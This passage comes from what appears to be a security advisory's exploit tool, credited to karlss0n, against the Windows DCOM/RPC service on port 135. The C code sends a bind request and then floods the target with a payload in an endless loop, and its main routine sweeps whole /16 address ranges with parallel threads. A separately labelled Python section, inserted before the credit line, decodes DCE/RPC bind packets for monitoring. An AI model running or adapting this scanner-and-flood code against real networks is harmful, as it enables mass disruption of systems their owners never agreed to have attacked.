       WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL);
      
       if (send(sock,(const char *)bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
       {
       printf("%s - send failed %d\n",ip,WSAGetLastError());
       return 0;
       }
       else {printf("%s - send exploit to %s\n",ip,target_os[vers].target);}
       
       len=recv(sock,(char *)buf1,1000,NULL);
       bool ft=1;
       if(ft)
       {
        int i=0;
        while(1)
        {
         if (send(sock,(const char *)buf2,len1,0)==SOCKET_ERROR)
         {
           printf("\nSend failed.Error:%d\n",WSAGetLastError());
           return 0;
         }
         else
         {
           printf("\r%d",++i);
         }
         //Sleep(1000);
        }
       }
       send(sock,(const char *)buf2,len1,0);
       closesocket(sock);
      }
      else fprintf(fp1,"%s %s\n",target_os[vers].target,ip);
    // fp=fopen("pac","wb");
    // fwrite(rawData,1,1036,fp);
    // fclose(fp);
      return 0;
    }
    unsigned long thread_count=0;
    char adr[200];

    DWORD WINAPI ThreadProc(
    LPVOID lpParameter // thread data
    )
    {
      thread_count++;
      attack(adr,0);

      thread_count--;
      return 0;
    }

    void main(int argc,char ** argv)
    {
    //printf("%x %x",OF_READWRITE,GETSTRCS(argv[1]));
    //return;
    //HFILE hf=_lopen("asd123",0x1001);
    //printf("%x",hf);
    //_lclose(hf);
    //return;

    WSADATA wsaData;

    int wVersionRequested;
    wVersionRequested = MAKEWORD( 2, 2 );

    int err = WSAStartup( wVersionRequested, &wsaData );
    if ( err != 0 ) {
     /* Tell the user that we could not find a usable */
     /* WinSock DLL. */
     return;
    }

      if(strchr(argv[1],'.'))
      {
       attack(argv[1],1);
       Sleep(20000);
       return;
      }
      int cb=1,db=1;
      cb=atoi(argv[3]);
      db=atoi(argv[4]);
      long tm=atoi(argv[5]);
      for(int c=cb;c<255;c++)
      {
       for(int d=db;d<255;d++)
       {
        sprintf(adr,"%s.%s.%d.%d",argv[1],argv[2],c,d);
        if(thread_count>tm) while(thread_count>tm) Sleep(100);
        CreateThread(NULL,0,&ThreadProc,"",0,NULL);
        Sleep(10);
        fflush(fp1);
       }
      }
      Sleep(60000);
      fclose(fp1);

    }
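    A defender-side companion to the code above, added here and not part of the original advisory or karlss0n's exploit: a Python decoder for the DCE/RPC bind PDU layout that the bindstr and peer0_0 arrays follow. It checks the header, verifies frag_length against the bytes actually received, and reports which interface UUIDs a bind requests, which is the check a port-135 monitor or IDS signature for this bug needs. The sample inputs are the page's own two bind arrays transcribed as hex; the two UUID-to-name entries are the standard DCOM interface identifiers.

```python
import struct
import uuid
from dataclasses import dataclass

PTYPE_BIND = 0x0B
# Public DCOM interface UUIDs that appear in the advisory's bind PDUs.
KNOWN_INTERFACES = {
    "000001a0-0000-0000-c000-000000000046": "ISystemActivator",
    "4d9f4ab8-7d1c-11cf-861e-0020af6e7c57": "IRemoteActivation",
}
# Sample inputs transcribed from the exploit: the 72-byte bindstr (one context)
# and the 204-byte peer0_0 bind that version() sends (four contexts).
BINDSTR = bytes.fromhex(
    "05000b0310000000480000007f000000"
    "d016d016000000000100000001000100"
    "a001000000000000c000000000000046"
    "00000000045d888aeb1cc9119fe80800"
    "2b10486002000000")
PEER0_0 = bytes.fromhex(
    "05000b0310000000cc0000008467be18"
    "31145c16000000000400000001000100"
    "b84a9f4d1c7dcf11861e0020af6e7c57"
    "00000000045d888aeb1cc9119fe80800"
    "2b1048600200000002000100a0010000"
    "00000000c00000000000004600000000"
    "045d888aeb1cc9119fe808002b104860"
    "02000000030001000a42240a00172141"
    "2e48011d130b044d00000000045d888a"
    "eb1cc9119fe808002b10486002000000"
    "04000100b0015297ca59cf11a8d500a0"
    "c90d805100000000045d888aeb1cc911"
    "9fe808002b10486002000000")

@dataclass
class Context:
    ctx_id: int
    abstract_syntax: str    # interface UUID, canonical text form
    abstract_version: int
    transfer_syntax: str    # first transfer syntax offered (NDR in both samples)

@dataclass
class BindPdu:
    frag_length: int
    call_id: int
    max_xmit_frag: int
    max_recv_frag: int
    contexts: list

def parse_bind(data: bytes) -> BindPdu:
    """Decode a DCE/RPC v5 bind PDU; ValueError if it is not one or lengths disagree."""
    if len(data) < 28:
        raise ValueError("shorter than a bind header")
    vers, _minor, ptype, _flags, drep, frag_len, _auth_len, call_id = \
        struct.unpack_from("<BBBB4sHHI", data, 0)
    if vers != 5 or ptype != PTYPE_BIND or not drep[0] & 0x10:
        raise ValueError(f"not a little-endian v5 bind PDU (ptype={ptype:#x})")
    if frag_len != len(data):
        # A frag_length that disagrees with the bytes on the wire is a signal in itself.
        raise ValueError(f"frag_length {frag_len} != {len(data)} bytes received")
    max_xmit, max_recv, _assoc_group, n_ctx = struct.unpack_from("<HHIB", data, 16)
    contexts, off = [], 28
    for _ in range(n_ctx):
        ctx_id, n_ts = struct.unpack_from("<HB", data, off)
        if n_ts < 1 or off + 24 + 20 * n_ts > len(data):
            raise ValueError("malformed or truncated presentation context list")
        abstract = str(uuid.UUID(bytes_le=data[off + 4:off + 20]))   # drep 0x10: LE fields
        (abstract_ver,) = struct.unpack_from("<I", data, off + 20)
        transfer = str(uuid.UUID(bytes_le=data[off + 24:off + 40]))
        off += 24 + 20 * n_ts   # each transfer syntax is a 16-byte UUID + 4-byte version
        contexts.append(Context(ctx_id, abstract, abstract_ver, transfer))
    return BindPdu(frag_len, call_id, max_xmit, max_recv, contexts)

def interfaces_requested(data: bytes) -> list:
    """Interface names (or raw UUIDs) a bind asks for: the hook for a port-135 monitor."""
    return [KNOWN_INTERFACES.get(c.abstract_syntax, c.abstract_syntax)
            for c in parse_bind(data).contexts]

if __name__ == "__main__":
    print(interfaces_requested(BINDSTR), interfaces_requested(PEER0_0))
```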

    ADDITIONAL INFORMATION

    The information has been provided by karlss0n.

